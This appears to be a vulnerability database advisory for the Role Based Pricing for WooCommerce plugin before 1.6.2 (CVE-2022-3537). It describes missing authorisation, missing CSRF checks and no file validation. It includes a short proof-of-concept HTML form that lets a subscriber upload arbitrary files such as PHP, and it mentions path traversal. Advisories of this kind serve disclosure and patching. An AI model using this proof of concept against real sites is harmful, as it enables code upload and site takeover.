Lucene search
WpvulndbWPEX-ID:696868F7-409D-422D-87F4-92FC6BF6E74EHistoryOct 17, 2022 - 12:00 a.m.
Role Based Pricing for WooCommerce < 1.6.2 - Subscriber+ Arbitrary File Upload
2022-10-1700:00:00
wpvulndb
57
role based pricing
woocommerce
subscriber
arbitrary file upload
html form
path traversal vector
EPSS
0.001
Percentile
32.6%
The plugin does not have authorisation and proper CSRF checks, and does not validate files to be uploaded, allowing any authenticated users like subscriber to upload arbitrary files, such as PHP
As a subscriber, open the HTML code below while being logged in as a subscriber, then choose a file to upload and submit it
<form action="https://example.com/wp-admin/admin-ajax.php?action=afcsp_upload_csv" method="POST" enctype="multipart/form-data">
<input type="file" name="afcsp_import_file" value="File to upload">
<input type="submit" name="submit" value="submit">
</form>
The file will be uploaded at https://example.com/wp-content/uploads/addify-role-pricing/ and have the same name than the original (path can also be found in the upload response). Path traversal vector could also be used to upload the file anywhereRelated
prion
prion
Cross site request forgery (csrf)
2022-11-07 10:15:00
cvelist
cvelist
cve
cve
CVE-2022-3537
2022-11-07 10:15:12
patchstack
patchstack
wpvulndb
wpvulndb
nvd
nvd
CVE-2022-3537
2022-11-07 10:15:12